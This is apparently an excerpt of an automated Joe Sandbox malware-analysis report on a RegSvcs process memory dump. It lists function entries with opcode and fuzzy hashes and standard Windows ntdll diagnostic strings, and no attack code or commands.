                                                                                              • Instruction ID: df02a6b072d26cd892bd82144bb93f4fa370c7006a44bd92c81f21343ae63149
                                                                                              • Opcode Fuzzy Hash: cfcbbfbb6ad43dae9f0787322ce03d234f194efb5931cbf7aec1b45ff1f83424
                                                                                              • Instruction Fuzzy Hash: E8F0E2715916909FF3A2971CC348BA97BE8BB487A0F08ADA5D58AC7517C36CE880CA50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                              • Instruction ID: 4a0bdb52d33267e203685d7b5878d21649285d316b20682e4394b6aa08331ee2
                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                              • Instruction Fuzzy Hash: 3BE0D872300A112BE7219F59CCC4F577BAEDFD6B10F040079FA045F252C9E6DD1982A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                              • Instruction ID: 355a4d2a37f1e1a141aa4e55bc519bdb625e9872b65c182025e39626390ad828
                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                              • Instruction Fuzzy Hash: A5F08C72500A049FF3228F09D840B53BBF8EB05364F018065F60A9B561D33AEC40CBA8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                              • Instruction ID: 1f69a7f707823e37286a32b4c5f535c42d204a0d861f55cbc83c302255e06c1a
                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                              • Instruction Fuzzy Hash: 28F0E53A204384DBDB16DF1AD050AA97BE8EB41350B100094E8828B351DB75F982EB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                              • Instruction ID: aa70838993ea44fdf2fa8ca4c4e8c6f63f5b593c0d2ada438d1efe195bc3f110
                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                              • Instruction Fuzzy Hash: 2AE0D833244645ABD3211A59C801B6A7BE5DBD07A0F970429F280CB174DB78DC40D7D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                              • Instruction ID: 94ad12b13310af8650e09f6c22b9f59b0e066d95b03752d52113454fdf6a2f1f
                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                              • Instruction Fuzzy Hash: 96E0DF32A00114BBDB21B7998D02F9ABEACEB90FA0F060054B740E70E0E631DE00D6D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 5bd9b5667ae2d9f9dc222b76d58bf69168168cfc8675ff0e950e2a780b667f72
                                                                                              • Instruction ID: c3320339807f9a1debf39e8a737f17a82d1c57b9aebd71016264a382f117a068
                                                                                              • Opcode Fuzzy Hash: 5bd9b5667ae2d9f9dc222b76d58bf69168168cfc8675ff0e950e2a780b667f72
                                                                                              • Instruction Fuzzy Hash: E8E092321005949BC722BF2ADD02F9B779AEF94360F014529F155571A1CB39B910D784
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                              • Instruction ID: bea866fe21ff8fa22764cd0ae10b9033ad1b50fd1332b6223a8b681b1ee09d95
                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                              • Instruction Fuzzy Hash: E3E09231010611DFEB326F29D918B927AE0AF90711F148C6CE1D6124B0CB78D8C0DA40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                              • Instruction ID: 8dec4113df36827c642b9b1826ce3528c097adffdbecfea078ee8c8be920fe77
                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                              • Instruction Fuzzy Hash: 1DE0C2343003168FE755CF19C044B627BFABFD5A10F28C0A8A9888F305EB32E842CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b8acc17bb811890d4302042926220155de4a5f7b56cb69a25bf0c832bee970b7
                                                                                              • Instruction ID: 2f979d52912697403ab17f1c27f755422d45ce14be666fe0a91b366d0ade0dd2
                                                                                              • Opcode Fuzzy Hash: b8acc17bb811890d4302042926220155de4a5f7b56cb69a25bf0c832bee970b7
                                                                                              • Instruction Fuzzy Hash: 01D02E334C20306AEB77F228BE04FE33A99AB40764F0648A0F688E2029D52CCC8192C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                              • Instruction ID: ccef759ff80ddaf180881dc03d44399ef3835888af36fabb7d8fb273750055f1
                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                              • Instruction Fuzzy Hash: 3BE0CD32500520DFDB322F15DC01F5176E6FF64B51F25485AF0C1161A48B745C82FB44
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                              • Instruction ID: da88e2a90561cbb58d8d169665f2532ffc4f8ecf60800ad91f8af6f7bfa8d08b
                                                                                              • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                              • Instruction Fuzzy Hash: 30E07D31051630DEDB316F02ED00F5276F6BF50750F14442AF042055B0CF74AC82F650
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e7ef62cfab6c6df14981b91fa009786d871e03efaa1ff0e129f96acda6e14cdc
                                                                                              • Instruction ID: d8101e7e8bfede622f20139d518ae5228f9a21a7fd0b37c264eea58f57058f65
                                                                                              • Opcode Fuzzy Hash: e7ef62cfab6c6df14981b91fa009786d871e03efaa1ff0e129f96acda6e14cdc
                                                                                              • Instruction Fuzzy Hash: 09E08C321004946BC611FA5EED12E5A739EEF94360F010225B150972A1CA29BD00D794
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                              • Instruction ID: 3955de86e663fe53303fbe44addf806ed2e6414fd0bb88293782af2dd9799652
                                                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                              • Instruction Fuzzy Hash: 74E08633111A1487D728DE18D511B7677E4EF45720F09863EA65347784C634E644C794
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                              • Instruction ID: 7d070f8408e737dbffcb608b93d4c00577b6abef139a684db1f2ddfca17c6532
                                                                                              • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                              • Instruction Fuzzy Hash: ECD05E36511A50AFC7329F1BEE00C13BBF9FFC4B10706066EA54583920C671A906DBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                              • Instruction ID: 5b492bffab929dea0a8ec6037eeb5ad44dc233302300b1ab1b034284402006d0
                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                              • Instruction Fuzzy Hash: 65D0A932204620ABDBB2AA1CFC00FD333E8AB88760F060499B008C7061C364AC81CA84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                              • Instruction ID: bec390ab46fb634e04cb35dc0b2adf515200db7a45b77998b8525998d4743ce5
                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                              • Instruction Fuzzy Hash: DCE0EC35950684ABDF92DF59DA40F5AFBF5BB84B40F150494A5886B661C628AA00DB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                              • Instruction ID: c6ead05cba39c75d8448e606fb4acc1192f43838320a3fa78564736135a0ff7c
                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                              • Instruction Fuzzy Hash: 72D0223321603093CF2856606C14F6379069F80BA0F1E006E340AA3A00C0088C42F6E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                              • Instruction ID: 6ac73228a0e003d8b7eefea19a62c965dd8ba1ce5cbcd67ca8801ea6034f8b26
                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                              • Instruction Fuzzy Hash: 01D012371D054DBBCB119F65DC02FA57BA9EB54BA0F454020B604875A1C63AE950D584
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 048bd85ddacb95df16fd169dad6b4422a6be0539bdc263fa181526f1fc5a32c3
                                                                                              • Instruction ID: d843a8b62e1558cd90113e8949baf077d744d6ff147f52c80ade7c341c16ec3b
                                                                                              • Opcode Fuzzy Hash: 048bd85ddacb95df16fd169dad6b4422a6be0539bdc263fa181526f1fc5a32c3
                                                                                              • Instruction Fuzzy Hash: 46D05E315450418BEF57CB09CA1492E3AB0FB04640B8000A8EFC051020D72ED801CA00
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                              • Instruction ID: e2b8565b1b29974c669f97b42b4cc57f6fdef9e5d7796cc862703e2d82446e5c
                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                              • Instruction Fuzzy Hash: FED0C975652E84CFC71ACB0CC5A8B2533A4FF44B44F8504E0E541CBB32DA2CDD40CA10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                              • Instruction ID: 288df94414747e0f3ea600a2fbf54c75209c999922a2e63ad1d59faf98d3a176
                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                              • Instruction Fuzzy Hash: 47C08C33290648AFCB12EF98DD02F127BE9EB98B40F010061F3048B671C635FD20EA84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                              • Instruction ID: fa2dc1c3df4c8347b6fe0c25406f2ccc7458cef33b62c3b329888632b65876c5
                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                              • Instruction Fuzzy Hash: 0BD01236100248EFCB02DF41C890E9A772AFBD8750F108019FD1907650CA31ED62DA50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                              • Instruction ID: 3354dbfbfe93dbc28cc3fcde93fd2548ad994f1f7d0d08ace59ac66fa87b8ae9
                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                              • Instruction Fuzzy Hash: 36C08838300A088FCF02CB2AC280F0833E8FB80300F0008C0EA00CBB22E228E802CA00
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: d761064f69be406982e979547c51074e4a8b1ba005ee8116fca2292713fb77fa
                                                                                              • Instruction ID: 7274b9b94156da34496bbc86cd4cdb2e855328443ccf3c84d955e3d379e37990
                                                                                              • Opcode Fuzzy Hash: d761064f69be406982e979547c51074e4a8b1ba005ee8116fca2292713fb77fa
                                                                                              • Instruction Fuzzy Hash: DD5107B2B04126BFCB61DB9C888097EFBF8BB49244B548269F5D5D7641D374DE008BA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: 654bc9e231f6a9325b49965c9b985eb169dd5dd40bbaeeec48f79f74f9863819
                                                                                              • Instruction ID: 6b3fbab36cbab1c3327ae19527656836ef08204a3f6a81fe32ce1e0c8cd003a7
                                                                                              • Opcode Fuzzy Hash: 654bc9e231f6a9325b49965c9b985eb169dd5dd40bbaeeec48f79f74f9863819
                                                                                              • Instruction Fuzzy Hash: 10510771A00645BFCF70DF9CC8A097FB7F9EB44200B44846AE5D6C7682DA74DA40A760
                                                                                              Strings
                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01054725
                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010546FC
                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01054742
                                                                                              • Execute=1, xrefs: 01054713
                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01054655
                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01054787
                                                                                              • ExecuteOptions, xrefs: 010546A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                              • API String ID: 0-484625025
                                                                                              • Opcode ID: deadd7910955e572533ab51a5546fa87d25cf93705667fd183b4910cb5891572
                                                                                              • Instruction ID: 769c98505e203bf1f2e4ea0582f932482ae1ba977fe3a0f7f366a62d23e4dfdd
                                                                                              • Opcode Fuzzy Hash: deadd7910955e572533ab51a5546fa87d25cf93705667fd183b4910cb5891572
                                                                                              • Instruction Fuzzy Hash: 0F513B3164021A7AEF11EBA8EC95FEE77A8FF19300F0404D9EA85A7181EB759A418F51
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldvrm
                                                                                              • String ID: +$-$0$0
                                                                                              • API String ID: 1302938615-699404926
                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                              • Instruction ID: f923538ffa2548f97496163c74099301c4727e4bd009c514bc7fb3a5ab891f94
                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                              • Instruction Fuzzy Hash: 2981E230E052698EEF25CE6CC8947FEBBF1BF45320F18419AD8E5A7291C7748841CB51
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: %%%u$[$]:%u
                                                                                              • API String ID: 48624451-2819853543
                                                                                              • Opcode ID: b7b01152f9643e37db8aefcd7464c3fd3ce79225aa0e189b3077a14374e6685b
                                                                                              • Instruction ID: 1dadb259bfb8f6e413a68285df84e8c896a4eae9b6d7a4a138b4ed64620a0470
                                                                                              • Opcode Fuzzy Hash: b7b01152f9643e37db8aefcd7464c3fd3ce79225aa0e189b3077a14374e6685b
                                                                                              • Instruction Fuzzy Hash: 8C2165BAA00119ABDB10DF79DC50AFEBBF9EF64650F140156EA85D3240E730DA119BA1
                                                                                              Strings
                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010502E7
                                                                                              • RTL: Re-Waiting, xrefs: 0105031E
                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010502BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                              • API String ID: 0-2474120054
                                                                                              • Opcode ID: c787111649d753416eabcd665dbf559e981fa2d2ae51ad96743b877fda78da0a
                                                                                              • Instruction ID: f26a6ce2681a30ffcbd76806e7d128e599ec658fe115de611482e63579fee838
                                                                                              • Opcode Fuzzy Hash: c787111649d753416eabcd665dbf559e981fa2d2ae51ad96743b877fda78da0a
                                                                                              • Instruction Fuzzy Hash: 5EE1AE306087429FE766CF28C884B6ABBE0BB88314F144A5DF9D5CB2D1D775D945CB42
                                                                                              Strings
                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01057B7F
                                                                                              • RTL: Resource at %p, xrefs: 01057B8E
                                                                                              • RTL: Re-Waiting, xrefs: 01057BAC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                              • API String ID: 0-871070163
                                                                                              • Opcode ID: 699f7c36f67558ff20655de9a9f0604acbb9aec2893af2648421274fd8c0f800
                                                                                              • Instruction ID: 89b9f0b8b954101263180d988b70a3e011e98c1fe81dce708fb5c1f491fe1ad3
                                                                                              • Opcode Fuzzy Hash: 699f7c36f67558ff20655de9a9f0604acbb9aec2893af2648421274fd8c0f800
                                                                                              • Instruction Fuzzy Hash: DB41B0317047039FD760DE29C841B6BB7E5EB98720F100A5DF9DA9B680DB72E8058B91
                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0105728C
                                                                                              Strings
                                                                                              • RTL: Resource at %p, xrefs: 010572A3
                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01057294
                                                                                              • RTL: Re-Waiting, xrefs: 010572C1
                                                                                              Memory Dump Source
